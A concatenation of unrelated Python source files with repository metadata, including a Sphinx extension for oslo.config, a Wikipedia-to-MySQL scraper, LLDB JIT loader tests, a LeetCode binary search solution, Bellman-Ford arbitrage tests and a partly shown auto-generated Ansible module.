        node.document = self.state.document
        nested_parse_with_titles(self.state, result, node)
        first_child = node.children[0]
        # Compute the normalized target and set the node to have that
        # as an id
        target_name = cfg._normalize_group_name(group_name)
        first_child['ids'].append(target_name)
        indexnode = addnodes.index(entries=[])
        return [indexnode] + node.children
class ConfigOption(ObjectDescription):
    "Description of a configuration option (.. option)."
    def handle_signature(self, sig, signode):
        """Transform an option description into RST nodes."""
        optname = sig
        LOG.debug('oslo.config option %s', optname)
        # Insert a node into the output showing the option name
        signode += addnodes.desc_name(optname, optname)
        signode['allnames'] = [optname]
        return optname
    def add_target_and_index(self, firstname, sig, signode):
        # Register the option under its "<group>.<option>" anchor so
        # cross-references can find the document that defines it.
        cached_options = self.env.domaindata['oslo.config']['options']
        # Look up the current group name from the processing context
        currgroup = self.env.temp_data.get('oslo.config:group')
        # Compute the normalized target name for the option and give
        # that to the node as an id
        target_name = _make_anchor_target(currgroup, sig)
        signode['ids'].append(target_name)
        self.state.document.note_explicit_target(signode)
        # Store the location of the option definition for later use in
        # resolving cross-references
        # FIXME: This should take the source namespace into account, too
        cached_options[target_name] = self.env.docname
class ConfigDomain(Domain):
    """oslo.config domain: registers the group/option directives and roles."""
    name = 'oslo.config'
    label = 'oslo.config'
    object_types = {
        'configoption': ObjType('configuration option', 'option'),
    }
    directives = {
        'group': ConfigGroup,
        'option': ConfigOption,
    }
    roles = {
        'option': ConfigOptXRefRole(),
        'group': ConfigGroupXRefRole(),
    }
    initial_data = {
        'options': {},
        'groups': {},
    }
    def resolve_xref(self, env, fromdocname, builder,
                     typ, target, node, contnode):
        """Resolve cross-references to group/option anchors.

        ROBUSTNESS FIX: unknown targets now return None (the Sphinx
        contract, which lets warn_dangling emit a normal warning)
        instead of crashing the build with a KeyError.
        """
        if typ == 'option':
            group_name, option_name = target.split('.', 1)
            docname = env.domaindata['oslo.config']['options'].get(target)
            if docname is None:
                return None
            return make_refnode(
                builder,
                fromdocname,
                docname,
                target,
                contnode,
                option_name,
            )
        if typ == 'group':
            docname = env.domaindata['oslo.config']['groups'].get(target)
            if docname is None:
                return None
            return make_refnode(
                builder,
                fromdocname,
                docname,
                target,
                contnode,
                target,
            )
        return None
def setup(app):
    """Sphinx extension entry point: register the oslo.config machinery.

    Returns the metadata dict declaring parallel-build safety.
    """
    # NOTE(dhellmann): Try to turn off lazy translation from oslo_i18n
    # so any translated help text or deprecation messages associated
    # with configuration options are treated as regular strings
    # instead of Message objects. Unfortunately this is a bit
    # order-dependent, and so it's still possible that importing code
    # from another module such as through the autodoc features, or
    # even through the plugin scanner, will turn lazy evaluation back
    # on.
    oslo_i18n.enable_lazy(False)
    app.add_directive('show-options', ShowOptionsDirective)
    app.add_domain(ConfigDomain)
    metadata = {
        'parallel_read_safe': True,
        'parallel_write_safe': True,
    }
    return metadata
| 34.213592
| 76
| 0.600284
|
4a1117440d38d3c4003a0ffef4133f94fcade0f2
| 2,043
|
py
|
Python
|
ch6-storing-data/saveToMySQL.py
|
DarkDesire/python-scraping
|
8023a4d129f756084ac39827a8cfb98a9201deed
|
[
"Apache-2.0"
] | null | null | null |
ch6-storing-data/saveToMySQL.py
|
DarkDesire/python-scraping
|
8023a4d129f756084ac39827a8cfb98a9201deed
|
[
"Apache-2.0"
] | null | null | null |
ch6-storing-data/saveToMySQL.py
|
DarkDesire/python-scraping
|
8023a4d129f756084ac39827a8cfb98a9201deed
|
[
"Apache-2.0"
] | null | null | null |
from urllib.request import urlopen
from bs4 import BeautifulSoup
import re
import pymysql
from random import shuffle
import pymysql
import ssl
# Disable HTTPS certificate verification process-wide so urlopen() works in
# environments with a broken certificate store. Insecure -- demo use only.
ssl._create_default_https_context = ssl._create_unverified_context
# Module-level MySQL connection/cursor shared by all helper functions below.
# NOTE(review): credentials are hard-coded for the book example.
conn = pymysql.connect(host='127.0.0.1',
                       user='root', passwd='admin', charset='utf8')
cur = conn.cursor()
cur.execute('USE wikipedia')
def insertPageIfNotExists(url):
    """Return the id of *url* in ``pages``, inserting a new row if absent.

    Uses the module-level cursor/connection. FIX: SQL parameters are now
    passed as real 1-tuples -- ``(url)`` is just ``url``, which only worked
    because pymysql tolerates a bare scalar.
    """
    cur.execute('SELECT * FROM pages WHERE url = %s', (url,))
    if cur.rowcount == 0:
        cur.execute('INSERT INTO pages (url) VALUES (%s)', (url,))
        conn.commit()
        return cur.lastrowid
    return cur.fetchone()[0]
def loadPages():
    """Fetch every stored page URL (column 1 of each ``pages`` row)."""
    cur.execute('SELECT * FROM pages')
    return [record[1] for record in cur.fetchall()]
def insertLink(fromPageId, toPageId):
    """Record a link between two page ids unless it is already stored."""
    id_pair = (int(fromPageId), int(toPageId))
    cur.execute('SELECT * FROM links WHERE fromPageId = %s AND toPageId = %s',
                id_pair)
    if cur.rowcount == 0:
        cur.execute('INSERT INTO links (fromPageId, toPageId) VALUES (%s, %s)',
                    id_pair)
        conn.commit()
def pageHasLinks(pageId):
    """Return True when at least one outgoing link is stored for *pageId*."""
    cur.execute('SELECT * FROM links WHERE fromPageId = %s', (int(pageId)))
    return cur.rowcount != 0
def getLinks(pageUrl, recursionLevel, pages):
    # Depth-first crawl of Wikipedia article links, recording pages and
    # page-to-page links in MySQL. Stops recursing past depth 4.
    if recursionLevel > 4:
        return
    pageId = insertPageIfNotExists(pageUrl)
    html = urlopen('http://en.wikipedia.org{}'.format(pageUrl))
    bs = BeautifulSoup(html, 'html.parser')
    # Only in-article links: paths under /wiki/ with no ':' (namespaces).
    links = bs.findAll('a', href=re.compile('^(/wiki/)((?!:).)*$'))
    links = [link.attrs['href'] for link in links]
    for link in links:
        linkId = insertPageIfNotExists(link)
        insertLink(pageId, linkId)
        if not pageHasLinks(linkId):
            # Only descend into pages that have not been expanded yet,
            # using stored links as the "already visited" marker.
            print("PAGE HAS NO LINKS: {}".format(link))
            pages.append(link)
            getLinks(link, recursionLevel+1, pages)
# Seed the crawl at the Kevin Bacon article, passing any previously stored
# pages, then close the database handles.
getLinks('/wiki/Kevin_Bacon', 0, loadPages())
cur.close()
conn.close()
| 31.921875
| 80
| 0.632403
|
4a11179e6b0281041520228a541ad20530340aaa
| 411
|
py
|
Python
|
docs/cookbook/advanced-messaging/sending_data_a.py
|
tjguk/networkzero
|
5b40e3a213f22dc82d2ce8d36925019eaaf2c06e
|
[
"MIT"
] | 39
|
2016-03-31T07:49:45.000Z
|
2021-09-01T10:34:02.000Z
|
docs/cookbook/advanced-messaging/sending_data_a.py
|
tjguk/networkzero
|
5b40e3a213f22dc82d2ce8d36925019eaaf2c06e
|
[
"MIT"
] | 48
|
2016-04-07T20:22:44.000Z
|
2021-09-26T18:12:01.000Z
|
docs/cookbook/advanced-messaging/sending_data_a.py
|
tjguk/networkzero
|
5b40e3a213f22dc82d2ce8d36925019eaaf2c06e
|
[
"MIT"
] | 15
|
2016-04-07T20:12:18.000Z
|
2019-10-25T14:31:41.000Z
|
import os, sys
import tempfile
import networkzero as nw0
# Advertise this process as the "gallery" service and print its address.
address = nw0.advertise("gallery")
print("Gallery:", address)

while True:
    # Receive (filename, data) pairs; autoreply acknowledges each message.
    filename, data = nw0.wait_for_message_from(address, autoreply=True)
    # FIX: renamed from `bytes`, which shadowed the builtin bytes type.
    payload = nw0.string_to_bytes(data)
    temp_filepath = os.path.join(tempfile.gettempdir(), filename)
    with open(temp_filepath, "wb") as f:
        f.write(payload)
    print("Wrote", temp_filepath)
| 27.4
| 71
| 0.712895
|
4a1117c66c89620a1846323d8eac41e81fcff500
| 11,005
|
py
|
Python
|
basicts/run.py
|
zezhishao/GuanCang_BasicTS
|
bbf82b9d08e82db78d4e9e9b11f43a676b54ad7c
|
[
"Apache-2.0"
] | null | null | null |
basicts/run.py
|
zezhishao/GuanCang_BasicTS
|
bbf82b9d08e82db78d4e9e9b11f43a676b54ad7c
|
[
"Apache-2.0"
] | null | null | null |
basicts/run.py
|
zezhishao/GuanCang_BasicTS
|
bbf82b9d08e82db78d4e9e9b11f43a676b54ad7c
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
sys.path.append(os.path.abspath(os.path.dirname(os.path.dirname(__file__))))
from argparse import ArgumentParser
from easytorch import launch_training
def parse_args(args=None):
    """Parse command-line options for a BasicTS training run.

    FIX: ~90 lines of commented-out alternate ``--cfg`` defaults (one per
    model/dataset combination) were dead code and have been removed; pick a
    different experiment by pointing ``--cfg`` at the matching file under
    ``basicts/options/<MODEL>/<MODEL>_<DATASET>.py``.

    Args:
        args: Optional argument list (for testing); defaults to
            ``sys.argv[1:]`` as usual for argparse.

    Returns:
        argparse.Namespace with ``cfg`` (training config path) and
        ``gpus`` (comma-separated visible GPU ids).
    """
    parser = ArgumentParser(description='Run time series forecasting model in BasicTS framework based on EasyTorch!')
    parser.add_argument('-c', '--cfg', default='basicts/options/GTS/GTS_PEMS03.py', help='training config')
    parser.add_argument('--gpus', default='0', help='visible gpus')
    return parser.parse_args(args)
if __name__ == "__main__":
    # Entry point: hand the chosen config file and GPU list to EasyTorch.
    args = parse_args()
    launch_training(args.cfg, args.gpus)
| 90.204918
| 129
| 0.703771
|
4a1118c2a292e74b0878ecbd0f73f721c94cb6de
| 4,045
|
py
|
Python
|
lldb/test/API/functionalities/jitloader_gdb/TestJITLoaderGDB.py
|
rarutyun/llvm
|
76fa6b3bcade074bdedef740001c4528e1aa08a8
|
[
"Apache-2.0"
] | 305
|
2019-09-14T17:16:05.000Z
|
2022-03-31T15:05:20.000Z
|
lldb/test/API/functionalities/jitloader_gdb/TestJITLoaderGDB.py
|
rarutyun/llvm
|
76fa6b3bcade074bdedef740001c4528e1aa08a8
|
[
"Apache-2.0"
] | 410
|
2019-06-06T20:52:32.000Z
|
2022-01-18T14:21:48.000Z
|
lldb/test/API/functionalities/jitloader_gdb/TestJITLoaderGDB.py
|
rarutyun/llvm
|
76fa6b3bcade074bdedef740001c4528e1aa08a8
|
[
"Apache-2.0"
] | 50
|
2019-05-10T21:12:24.000Z
|
2022-01-21T06:39:47.000Z
|
"""Test for the JITLoaderGDB interface"""
import unittest2
import os
import lldb
from lldbsuite.test import lldbutil
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
class JITLoaderGDBTestCase(TestBase):
    """Tests for the JITLoaderGDB plugin and its 'enable' setting.

    FIX: the log files were read via bare ``open(logfile).read()``,
    leaking the file handle; both reads now use ``with`` blocks.
    """
    mydir = TestBase.compute_mydir(__file__)
    @skipTestIfFn(
        lambda: "Skipped because the test crashes the test runner",
        bugnumber="llvm.org/pr24702")
    @expectedFailure("llvm.org/pr24702")
    def test_bogus_values(self):
        """Test that we handle inferior misusing the GDB JIT interface"""
        self.build()
        exe = self.getBuildArtifact("a.out")
        # Create a target by the debugger.
        target = self.dbg.CreateTarget(exe)
        self.assertTrue(target, VALID_TARGET)
        # Launch the process, do not stop at entry point.
        process = target.LaunchSimple(
            None, None, self.get_process_working_directory())
        self.assertTrue(process, PROCESS_IS_VALID)
        # The inferior will now pass bogus values over the interface. Make sure
        # we don't crash.
        self.assertEqual(process.GetState(), lldb.eStateExited)
        self.assertEqual(process.GetExitStatus(), 0)
    def gen_log_file(self):
        """Return a per-architecture log file path, removed on teardown."""
        logfile = self.getBuildArtifact("jitintgdb-{}.txt".format(self.getArchitecture()))
        def cleanup():
            if os.path.exists(logfile):
                os.unlink(logfile)
        self.addTearDownHook(cleanup)
        return logfile
    def test_jit_int_default(self):
        """The jit-loader enable setting defaults to 'default'."""
        self.expect("settings show plugin.jit-loader.gdb.enable",
                    substrs=["plugin.jit-loader.gdb.enable (enum) = default"])
    @skipIfWindows # This test fails on Windows during C code build
    def test_jit_int_on(self):
        """Tests interface with 'enable' settings 'on'"""
        self.build()
        exe = self.getBuildArtifact("simple")
        logfile = self.gen_log_file()
        self.runCmd("log enable -f %s lldb jit" % (logfile))
        self.runCmd("settings set plugin.jit-loader.gdb.enable on")
        def cleanup():
            self.runCmd("log disable lldb")
            self.runCmd("settings set plugin.jit-loader.gdb.enable default")
        self.addTearDownHook(cleanup)
        # Launch the process.
        target = self.dbg.CreateTarget(exe)
        self.assertTrue(target, VALID_TARGET)
        process = target.LaunchSimple(
            None, None, self.get_process_working_directory())
        self.assertTrue(process, PROCESS_IS_VALID)
        self.assertEqual(process.GetState(), lldb.eStateExited)
        self.assertEqual(process.GetExitStatus(), 0)
        if not configuration.is_reproducer():
            self.assertTrue(os.path.exists(logfile))
            # With the plugin enabled, the JIT breakpoint must be set.
            with open(logfile) as f:
                logcontent = f.read()
            self.assertIn("SetJITBreakpoint setting JIT breakpoint", logcontent)
    @skipIfWindows # This test fails on Windows during C code build
    def test_jit_int_off(self):
        """Tests interface with 'enable' settings 'off'"""
        self.build()
        exe = self.getBuildArtifact("simple")
        logfile = self.gen_log_file()
        self.runCmd("log enable -f %s lldb jit" % (logfile))
        self.runCmd("settings set plugin.jit-loader.gdb.enable off")
        def cleanup():
            self.runCmd("log disable lldb")
            self.runCmd("settings set plugin.jit-loader.gdb.enable default")
        self.addTearDownHook(cleanup)
        # Launch the process.
        target = self.dbg.CreateTarget(exe)
        self.assertTrue(target, VALID_TARGET)
        process = target.LaunchSimple(
            None, None, self.get_process_working_directory())
        self.assertTrue(process, PROCESS_IS_VALID)
        self.assertEqual(process.GetState(), lldb.eStateExited)
        self.assertEqual(process.GetExitStatus(), 0)
        if not configuration.is_reproducer():
            self.assertTrue(os.path.exists(logfile))
            # With the plugin disabled, the JIT breakpoint must NOT be set.
            with open(logfile) as f:
                logcontent = f.read()
            self.assertNotIn("SetJITBreakpoint setting JIT breakpoint", logcontent)
| 37.453704
| 90
| 0.655624
|
4a1118f108a55a1a20e4d1b27c2589f53b05430c
| 2,210
|
py
|
Python
|
leetcode/34.py
|
pingrunhuang/CodeChallenge
|
a8e5274e04c47d851836197907266418af4f1a22
|
[
"MIT"
] | null | null | null |
leetcode/34.py
|
pingrunhuang/CodeChallenge
|
a8e5274e04c47d851836197907266418af4f1a22
|
[
"MIT"
] | null | null | null |
leetcode/34.py
|
pingrunhuang/CodeChallenge
|
a8e5274e04c47d851836197907266418af4f1a22
|
[
"MIT"
] | null | null | null |
'''
Given an array of integers nums sorted in ascending order, find the starting and ending position of a given target value.
Your algorithm's runtime complexity must be in the order of O(log n).
If the target is not found in the array, return [-1, -1].
TODO Could not solve the corner case
'''
class Solution:
    """Binary-search solution for LeetCode 34 (Find First and Last Position
    of Element in Sorted Array), running in O(log n).

    Fixes the corner cases of the previous version: the outer `while l < r`
    search never examined the final index (e.g. searchRange([1, 4], 4)
    returned [-1, -1]), and binarySearchHighest mishandled runs of more than
    two equal elements.
    """

    def binarySearchLowest(self, nums, left, right, target):
        """Return the left-most index in nums[left..right] whose value is
        >= target (the first occurrence when target is present)."""
        while left < right:
            mid = left + (right - left) // 2
            if nums[mid] < target:
                left = mid + 1
            else:
                # nums[mid] >= target: the answer is at mid or before it.
                right = mid
        return left

    def binarySearchHighest(self, nums, left, right, target):
        """Return the right-most index in nums[left..right] whose value is
        <= target (the last occurrence when target is present)."""
        while left < right:
            # Bias the midpoint to the right so the loop converges on the
            # last occurrence instead of looping when right == left + 1.
            mid = left + (right - left + 1) // 2
            if nums[mid] > target:
                right = mid - 1
            else:
                left = mid
        return left

    def searchRange(self, nums, target):
        """
        :type nums: List[int]
        :type target: int
        :rtype: List[int] -- [first, last] indices of target, or [-1, -1]
        """
        if not nums:
            return [-1, -1]
        first = self.binarySearchLowest(nums, 0, len(nums) - 1, target)
        # The lower-bound index always lands in range; a single membership
        # check here covers every "target absent" case, including a target
        # larger or smaller than all elements.
        if nums[first] != target:
            return [-1, -1]
        last = self.binarySearchHighest(nums, 0, len(nums) - 1, target)
        return [first, last]
if __name__ == "__main__":
    solver = Solution()
    # Same sample queries as before, driven from a table instead of
    # repeated statements.
    cases = [
        ([5, 7, 7, 8, 8, 10], 8),
        ([5, 7, 7, 8, 8, 10], 6),
        ([2, 2], 2),
        ([1, 4], 4),
        ([1, 2, 5, 5, 5, 9], 5),
    ]
    for nums, target in cases:
        print(solver.searchRange(nums, target))
| 29.078947
| 121
| 0.499548
|
4a11190eae860050c3ccca11b79bc0c8b6e86f2d
| 939
|
py
|
Python
|
examples/multi-column-autocompletion.py
|
davidbrochart/python-prompt-toolkit
|
8498692b31671fee7c5a426300a9df2ee290eae2
|
[
"BSD-3-Clause"
] | 2
|
2020-04-12T01:23:25.000Z
|
2021-05-22T13:46:00.000Z
|
examples/multi-column-autocompletion.py
|
davidbrochart/python-prompt-toolkit
|
8498692b31671fee7c5a426300a9df2ee290eae2
|
[
"BSD-3-Clause"
] | null | null | null |
examples/multi-column-autocompletion.py
|
davidbrochart/python-prompt-toolkit
|
8498692b31671fee7c5a426300a9df2ee290eae2
|
[
"BSD-3-Clause"
] | 2
|
2016-12-30T23:57:44.000Z
|
2021-05-22T13:50:21.000Z
|
#!/usr/bin/env python
"""
Similar to the autocompletion example. But display all the completions in multiple columns.
"""
from __future__ import unicode_literals
from prompt_toolkit.contrib.completers import WordCompleter
from prompt_toolkit import prompt
# Completion vocabulary for the prompt below; original spellings ('dolphine',
# 'kangoroo') are preserved byte-for-byte from the example.
animal_completer = WordCompleter(
    'alligator ant ape bat bear beaver bee bison butterfly cat chicken '
    'crocodile dinosaur dog dolphine dove duck eagle elephant fish goat '
    'gorilla kangoroo leopard lion mouse rabbit rat snake spider turkey '
    'turtle'.split(),
    ignore_case=True,
)
def main():
    """Prompt for animal names, showing completions in a multi-column menu."""
    answer = prompt('Give some animals: ',
                    completer=animal_completer,
                    display_completions_in_columns=True)
    print('You said: %s' % answer)
# Allow running this example directly as a script.
if __name__ == '__main__':
    main()
| 17.388889
| 105
| 0.597444
|
4a11191cc78b9f390ebed5f50ec6a3bc064d0ce3
| 492
|
py
|
Python
|
rdmo/questions/urls/__init__.py
|
Raspeanut/rdmo
|
9f785010a499c372a2f8368ccf76d2ea4150adcb
|
[
"Apache-2.0"
] | null | null | null |
rdmo/questions/urls/__init__.py
|
Raspeanut/rdmo
|
9f785010a499c372a2f8368ccf76d2ea4150adcb
|
[
"Apache-2.0"
] | null | null | null |
rdmo/questions/urls/__init__.py
|
Raspeanut/rdmo
|
9f785010a499c372a2f8368ccf76d2ea4150adcb
|
[
"Apache-2.0"
] | null | null | null |
from django.urls import include, re_path
from rest_framework import routers
from ..views import CatalogExportView, CatalogImportXMLView, CatalogsView
# NOTE: Django tries patterns in order, and the last pattern (^catalogs/) is
# unanchored at the end, so it matches any path beginning with 'catalogs/'.
# It must therefore stay AFTER the export/import routes or it would shadow them.
urlpatterns = [
    # Export one catalog (by primary key) in the requested format, e.g. xml.
    re_path(r'^catalogs/(?P<pk>[0-9]+)/export/(?P<format>[a-z]+)/$', CatalogExportView.as_view(), name='questions_catalog_export'),
    # Import a catalog from an uploaded file in the given format.
    re_path(r'^catalogs/import/(?P<format>[a-z]+)/$', CatalogImportXMLView.as_view(), name='questions_catalog_import'),
    # Catch-all catalogs listing/management view.
    re_path(r'^catalogs/', CatalogsView.as_view(), name='catalogs'),
]
| 41
| 131
| 0.73374
|
4a111b23d0a976b761ae69f036294d2cf749efb9
| 162
|
py
|
Python
|
eurofx/__init__.py
|
supercoderz/pyeurofx
|
3f579bb6e4836dadb187df8c74a9d186ae7e39e7
|
[
"MIT"
] | 2
|
2018-07-14T11:58:35.000Z
|
2018-11-19T22:47:58.000Z
|
eurofx/__init__.py
|
supercoderz/pyeurofx
|
3f579bb6e4836dadb187df8c74a9d186ae7e39e7
|
[
"MIT"
] | null | null | null |
eurofx/__init__.py
|
supercoderz/pyeurofx
|
3f579bb6e4836dadb187df8c74a9d186ae7e39e7
|
[
"MIT"
] | 2
|
2017-01-03T11:50:45.000Z
|
2019-11-01T14:33:40.000Z
|
from .eurofx import get_historical_data,get_daily_data,get_currency_list
from .eurofx_pandas import get_historical_data_df,get_daily_data_df,get_currency_list_df
| 54
| 88
| 0.91358
|
4a111b56d327d182f51f5b9197073fba275d6f32
| 412
|
py
|
Python
|
setup.py
|
esupoff/astor
|
5c52bc2685793cef876acd95fa0aacca3c95ca3f
|
[
"BSD-3-Clause"
] | 1
|
2021-07-07T09:05:57.000Z
|
2021-07-07T09:05:57.000Z
|
setup.py
|
esupoff/astor
|
5c52bc2685793cef876acd95fa0aacca3c95ca3f
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
esupoff/astor
|
5c52bc2685793cef876acd95fa0aacca3c95ca3f
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import sys
from setuptools import setup
from setuptools.config import read_configuration
from setuputils import find_version
def here(*paths):
    """Return *paths* joined onto the directory containing this setup script."""
    base_dir = os.path.dirname(__file__)
    return os.path.join(base_dir, *paths)
# Read the declarative configuration from setup.cfg, then override the version
# with the value parsed out of astor/__init__.py so it is defined in exactly
# one place, and feed the merged metadata+options mapping to setuptools.
config = read_configuration(here('setup.cfg'))
config['metadata']['version'] = find_version(here('astor', '__init__.py'))
config['options'].update(config['metadata'])
setup(**config['options'])
| 22.888889
| 74
| 0.754854
|
4a111caf55597e56c7d387d6a2d92cdf594238ea
| 3,439
|
py
|
Python
|
peregrinearb/tests/bellmannx_test.py
|
lyn716/peregrine
|
5b1f6a839bf4a86198ad85f527b04b9a34ea7ab9
|
[
"MIT"
] | null | null | null |
peregrinearb/tests/bellmannx_test.py
|
lyn716/peregrine
|
5b1f6a839bf4a86198ad85f527b04b9a34ea7ab9
|
[
"MIT"
] | null | null | null |
peregrinearb/tests/bellmannx_test.py
|
lyn716/peregrine
|
5b1f6a839bf4a86198ad85f527b04b9a34ea7ab9
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from peregrinearb import bellman_ford_multi, multi_digraph_from_json, multi_digraph_from_dict, \
calculate_profit_ratio_for_path, bellman_ford
import json
import networkx as nx
def graph_from_dict(graph_dict):
    """
    Rebuild a networkx graph from its serialized description.

    :param graph_dict: mapping holding the graph class name under
        'graph_type' and the serialized adjacency data under 'graph_dict'
    :return: the reconstructed graph
    :raises ValueError: if 'graph_type' is missing or not a recognized name
    """
    if 'graph_type' not in graph_dict:
        raise ValueError('graph_dict must contain key "graph_type"')
    graph_type = graph_dict['graph_type']
    if graph_type == 'MultiDiGraph':
        return multi_digraph_from_dict(graph_dict['graph_dict'])
    if graph_type == 'MultiGraph':
        return nx.from_dict_of_dicts(graph_dict['graph_dict'], multigraph_input=True)
    if graph_type in ('DiGraph', 'Graph', 'other'):
        # These three types all deserialize through the same plain constructor.
        return nx.from_dict_of_dicts(graph_dict['graph_dict'])
    raise ValueError("the value for 'graph_type' in graph_dict is not of the accepted values.")
def digraph_from_multi_graph_json(file_name):
    """
    file_name should hold a JSON which represents a MultiDigraph where there is
    a maximum of two edges each in opposing directions between each node; the
    keyed parallel-edge layer is flattened into a plain DiGraph.
    :param file_name: path of the JSON file to load
    :return: nx.DiGraph with one attributed edge per (source, target) pair
    """
    with open(file_name) as handle:
        adjacency = json.load(handle)
    digraph = nx.DiGraph()
    for source, neighbors in adjacency.items():
        for target, keyed_edges in neighbors.items():
            for edge_attributes in keyed_edges.values():
                digraph.add_edge(source, target, **edge_attributes)
    return digraph
class TestBellmanFordMultiGraph(TestCase):
    """Run bellman_ford_multi from every node of the sample multigraph fixture."""

    def test_path_beginning_equals_end(self):
        """Each reported arbitrage path must be a closed cycle."""
        graph = multi_digraph_from_json('test_multigraph.json')
        for source in graph:
            _, paths = bellman_ford_multi(graph, source)
            for path in paths:
                if not path:
                    continue
                self.assertEqual(path[0], path[-1])

    def test_positive_ratio(self):
        """Every negative-weight cycle must translate to a profit ratio >= 1."""
        graph = multi_digraph_from_json('test_multigraph.json')
        for source in graph:
            weighted_graph, paths = bellman_ford_multi(graph, source)
            for path in paths:
                if not path:
                    continue
                # assert that the path is a negative weight cycle;
                # python float precision may round some ratios down to 1.0.
                ratio = calculate_profit_ratio_for_path(weighted_graph, path)
                self.assertGreaterEqual(ratio, 1.0)

    def test_loop_from_source(self):
        """With loop_from_source=True each cycle must start/end at the source."""
        graph = multi_digraph_from_json('test_multigraph.json')
        for source in graph:
            _, paths = bellman_ford_multi(graph, source, loop_from_source=True)
            for path in paths:
                if not path:
                    continue
                self.assertEqual(path[0], path[-1])
                self.assertEqual(source, path[0])
class TestBellmannx(TestCase):
    """Sanity checks for the plain bellman_ford implementation."""

    def test_ensure_profit_yields_profit(self):
        """With ensure_profit=True every returned cycle must have negative total weight."""
        graph = nx.DiGraph()
        for u, v, w in [(0, 1, 4), (1, 0, 3), (1, 2, -1), (2, 3, -1), (3, 1, -1)]:
            graph.add_edge(u, v, weight=w)
        paths = bellman_ford(graph, 0, loop_from_source=True, ensure_profit=True)
        for path in paths:
            total = sum(graph[a][b]['weight'] for a, b in zip(path, path[1:]))
            self.assertLess(total, 0)
| 36.978495
| 119
| 0.640012
|
4a111ce8c93b72da44f8e7357a247203f33c7d73
| 1,102
|
py
|
Python
|
src/pipelinex/framework/context/pipelines_in_parameters_context.py
|
Lap1n/pipelinex
|
aed47be7fd27618e345d34217e199d3795153add
|
[
"Apache-2.0"
] | null | null | null |
src/pipelinex/framework/context/pipelines_in_parameters_context.py
|
Lap1n/pipelinex
|
aed47be7fd27618e345d34217e199d3795153add
|
[
"Apache-2.0"
] | null | null | null |
src/pipelinex/framework/context/pipelines_in_parameters_context.py
|
Lap1n/pipelinex
|
aed47be7fd27618e345d34217e199d3795153add
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict # NOQA
from kedro.pipeline import Pipeline # NOQA
from importlib import import_module
from .hatch_parameters_context import HatchParametersContext
from .hooks_in_parameters_context import HooksInParametersContext
class PipelinesInParametersContext(HatchParametersContext, HooksInParametersContext):
    """Kedro context whose pipelines and run configuration are declared in the
    'parameters' catalog entry (keys: IMPORT, PIPELINES, RUN_CONFIG)."""

    def _get_pipelines(self) -> Dict[str, Pipeline]:
        """Load and return the PIPELINES mapping from parameters."""
        parameters = self.catalog._data_sets["parameters"].load()
        # Import any modules listed under IMPORT first, so the pipeline
        # objects they define become resolvable.
        import_modules(parameters.get("IMPORT"))
        pipelines = parameters.get("PIPELINES")
        assert pipelines
        return pipelines

    def run(self, *args, **kwargs):
        """Run with RUN_CONFIG defaults from parameters; explicit kwargs win."""
        parameters = self.catalog._data_sets["parameters"].load()
        run_options = parameters.get("RUN_CONFIG", dict())
        run_options.update(kwargs)
        return super().run(*args, **run_options)
def import_modules(modules=None):
    """Import each named module.

    :param modules: a single dotted module name, a list of such names, or a
        falsy value (in which case nothing happens)
    """
    if not modules:
        return
    if not isinstance(modules, list):
        # Normalize a bare string into a one-element list.
        modules = [modules]
    for name in modules:
        assert isinstance(name, str), "'{}' is not string.".format(name)
        import_module(name)
| 36.733333
| 85
| 0.69873
|
4a111d1bf64e336ba2f0599f53c13a3d8343e481
| 4,184
|
py
|
Python
|
plugins/modules/nsi_api_v1_search_fres_by_freid.py
|
ciena/ciena.mcp
|
b266a7cbd912c547f6e4877597d67ea9254e5758
|
[
"Apache-2.0"
] | 3
|
2021-07-19T23:56:34.000Z
|
2021-11-08T14:23:53.000Z
|
plugins/modules/nsi_api_v1_search_fres_by_freid.py
|
ciena/ciena.mcp
|
b266a7cbd912c547f6e4877597d67ea9254e5758
|
[
"Apache-2.0"
] | 1
|
2022-01-19T22:06:49.000Z
|
2022-01-24T15:16:53.000Z
|
plugins/modules/nsi_api_v1_search_fres_by_freid.py
|
ciena/ciena.mcp
|
b266a7cbd912c547f6e4877597d67ea9254e5758
|
[
"Apache-2.0"
] | 1
|
2021-11-08T14:25:29.000Z
|
2021-11-08T14:25:29.000Z
|
#!/usr/bin/env python
# Info module template
#############################################
# WARNING #
#############################################
#
# This file is auto generated by
# https://github.com/jgroom33/vmware_rest_code_generator
#
# Do not edit this file manually.
#
# Changes should be made in the swagger used to
# generate this file or in the generator
#
#############################################
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import socket
import json
DOCUMENTATION = """
module: nsi_api_v1_search_fres_by_freid
short_description: Handle resource of type nsi_api_v1_search_fres_by_freid
description: Handle resource of type nsi_api_v1_search_fres_by_freid
options:
fields:
description:
- (Optional) List of comma separated fields to be included in the response. Fields
require full path (i.e. data.attributes.field)
- Used by I(state=['get'])
type: str
freId:
description:
- Identifier of the FRE to be retrieved
- Required with I(state=['get'])
- Used by I(state=['get'])
type: str
include:
description:
- '(Optional) List of comma separated resources to be side-loaded. The allowed
values are: fres, tpes, networkConstructs, equipment, expectations, frePlanned,
freDiscovered, abstracts, controllers'
- Used by I(state=['get'])
type: str
state:
choices:
- get
description: []
type: str
author: []
version_added: 1.0.0
requirements:
- python >= 3.6
"""
IN_QUERY_PARAMETER = ["fields", "include"]
from ansible.module_utils.basic import env_fallback
try:
from ansible_module.turbo.module import AnsibleTurboModule as AnsibleModule
except ImportError:
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.ciena.mcp.plugins.module_utils.mcp import (
gen_args,
open_session,
update_changed_flag,
)
def prepare_argument_spec():
    """Build the AnsibleModule argument spec for this resource.

    Connection credentials fall back to the MCP_HOST / MCP_USER / MCP_PASSWORD
    environment variables; the remaining keys mirror the DOCUMENTATION options.
    """
    # Insertion order matches the original spec, so the resulting dict is
    # equal to the one previously built incrementally.
    return {
        "mcp_hostname": dict(
            type="str", required=False, fallback=(env_fallback, ["MCP_HOST"])
        ),
        "mcp_username": dict(
            type="str", required=False, fallback=(env_fallback, ["MCP_USER"])
        ),
        "mcp_password": dict(
            type="str",
            required=False,
            no_log=True,
            fallback=(env_fallback, ["MCP_PASSWORD"]),
        ),
        "state": {"type": "str", "choices": ["get"]},
        "include": {"type": "str", "operationIds": ["get"]},
        "freId": {"type": "str", "operationIds": ["get"]},
        "fields": {"type": "str", "operationIds": ["get"]},
    }
async def main():
